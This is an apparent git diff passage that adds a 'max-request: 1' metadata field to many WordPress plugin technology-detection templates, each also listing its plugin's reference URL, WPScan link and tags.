http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index e555bf93d3..425adf0bfe 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: + max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 